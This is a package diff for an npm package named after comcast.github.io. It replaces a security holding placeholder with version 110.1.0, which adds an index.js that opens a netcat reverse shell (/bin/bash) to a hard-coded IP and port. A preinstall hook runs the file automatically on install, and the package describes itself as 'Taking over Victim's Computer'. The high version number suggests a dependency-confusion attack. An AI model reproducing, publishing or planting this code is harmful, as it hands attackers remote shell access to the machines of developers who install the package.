comcast.github.io 0.0.1-security → 110.1.0

package/index.js

@@ -0,0 +1,22 @@
+const { exec } = require("child_process");
+const https = require("https");
+
+// Replace 'your_ip' with your actual IP address
+const your_ip = "192.168.98.136";
+const your_port = 4444;  // Ensure this matches the port from Step 1
+
+// Command to create a reverse shell
+const reverseShellCommand = `nc ${your_ip} ${your_port} -e /bin/bash`;
+
+// Execute the reverse shell command
+exec(reverseShellCommand, (error, stdout, stderr) => {
+    if (error) {
+        console.error(`Error: ${error.message}`);
+        return;
+    }
+    if (stderr) {
+        console.error(`Stderr: ${stderr}`);
+        return;
+    }
+    console.log(`Output: ${stdout}`);
+});

package/package.json

@@ -1,6 +1,17 @@
 {
   "name": "comcast.github.io",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "110.1.0",
+  "description": "Taking over Victim's Computer by M1S0",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+    "comcast.github.io": "^110.1.0"
+  }
 }
+
+

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=comcast.github.io for more information.